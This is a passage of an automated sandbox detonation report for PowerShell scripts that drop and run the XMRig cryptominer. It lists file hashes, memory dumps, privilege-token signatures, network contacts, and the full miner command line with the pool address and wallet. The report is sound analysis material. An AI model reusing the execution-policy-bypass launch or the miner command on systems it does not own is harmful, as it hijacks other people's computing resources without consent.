memory/3272-0-0x00007FF8262D3000-0x00007FF8262D5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4n2rxhdv.mtg.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3272-9-0x0000019279690000-0x00000192796B2000-memory.dmp

memory/3272-10-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-11-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-12-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-14-0x0000019279B90000-0x0000019279BA2000-memory.dmp

memory/3272-15-0x0000019279B80000-0x0000019279B8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1272-46-0x00000244B2410000-0x00000244B2430000-memory.dmp

memory/1272-47-0x00000244B2460000-0x00000244B2480000-memory.dmp

memory/1272-48-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/3272-49-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/3272-51-0x00007FF8262D3000-0x00007FF8262D5000-memory.dmp

memory/1272-50-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-53-0x00000244B24A0000-0x00000244B24C0000-memory.dmp

memory/1272-52-0x00000244B2480000-0x00000244B24A0000-memory.dmp

memory/3272-54-0x00007FF8262D0000-0x00007FF826D92000-memory.dmp

memory/1272-55-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-56-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-58-0x00000244B24A0000-0x00000244B24C0000-memory.dmp

memory/1272-57-0x00000244B2480000-0x00000244B24A0000-memory.dmp

memory/1272-59-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-60-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-61-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-62-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-63-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-64-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-65-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-66-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

memory/1272-67-0x00007FF77AB70000-0x00007FF77B7A3000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240226-en

Max time kernel

146s

Max time network

138s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2268 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 216.58.201.106:443 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/1368-0-0x00007FFC22ED3000-0x00007FFC22ED5000-memory.dmp

memory/1368-6-0x0000025CD8DD0000-0x0000025CD8DF2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wspivrpz.xcx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1368-11-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-12-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-13-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-15-0x00007FFC22ED3000-0x00007FFC22ED5000-memory.dmp

memory/1368-16-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1368-17-0x0000025CD9AF0000-0x0000025CD9B02000-memory.dmp

memory/1368-18-0x0000025CD9AE0000-0x0000025CD9AEA000-memory.dmp

memory/1368-19-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1368-48-0x00007FFC22ED0000-0x00007FFC23991000-memory.dmp

memory/1484-51-0x000001DB618A0000-0x000001DB618C0000-memory.dmp

memory/1484-52-0x000001DB632A0000-0x000001DB632C0000-memory.dmp

memory/1484-53-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-54-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-57-0x000001DBF5E90000-0x000001DBF5EB0000-memory.dmp

memory/1484-56-0x000001DBF5E70000-0x000001DBF5E90000-memory.dmp

memory/1484-55-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-58-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-59-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-60-0x000001DBF5E70000-0x000001DBF5E90000-memory.dmp

memory/1484-61-0x000001DBF5E90000-0x000001DBF5EB0000-memory.dmp

memory/1484-62-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-63-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-64-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-65-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-66-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

memory/1484-67-0x00007FF6EEA10000-0x00007FF6EF643000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

147s

Max time network

145s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 7.173.189.20.in-addr.arpa udp

Files

memory/3508-3-0x00007FF992773000-0x00007FF992774000-memory.dmp

memory/3508-5-0x000001CE32040000-0x000001CE32062000-memory.dmp

memory/3508-8-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-9-0x000001CE321F0000-0x000001CE32266000-memory.dmp

memory/3508-18-0x00007FF992770000-0x00007FF99315C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulzrbx3p.245.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3508-25-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-48-0x000001CE32370000-0x000001CE32382000-memory.dmp

memory/3508-61-0x000001CE321D0000-0x000001CE321DA000-memory.dmp

memory/3508-83-0x00007FF992773000-0x00007FF992774000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2576-91-0x000002146BEB0000-0x000002146BED0000-memory.dmp

memory/3508-92-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/3508-94-0x00007FF992770000-0x00007FF99315C000-memory.dmp

memory/2576-93-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-95-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-96-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-97-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-98-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-99-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-100-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-101-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-102-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-103-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-104-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-105-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

memory/2576-106-0x00007FF6A7330000-0x00007FF6A7F63000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10-20240404-en

Max time kernel

142s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp

Files

memory/1944-4-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-5-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-6-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-7-0x000001D66E620000-0x000001D66E642000-memory.dmp

memory/1944-10-0x000001D66E8F0000-0x000001D66E966000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ks3vrjr0.ofv.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1944-25-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/1944-61-0x000001D66E6A0000-0x000001D66E6AA000-memory.dmp

memory/1944-48-0x000001D66E6B0000-0x000001D66E6C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3916-90-0x00000293E6620000-0x00000293E6640000-memory.dmp

memory/3916-91-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/1944-92-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/3916-93-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/1944-94-0x00007FFAA9870000-0x00007FFAA9A4B000-memory.dmp

memory/3916-95-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-96-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-97-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-98-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-99-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-100-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-101-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-102-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-103-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-104-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

memory/3916-105-0x00007FF79B890000-0x00007FF79C4C3000-memory.dmp

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win10v2004-20240508-en

Max time kernel

141s

Max time network

144s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3144,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=3744 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
NL 23.62.61.97:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qhymaskh.ze0.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 18:28

Reported

2024-05-27 18:32

Platform

win11-20240419-en

Max time kernel

145s

Max time network

154s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hm4v4kd1.fvl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
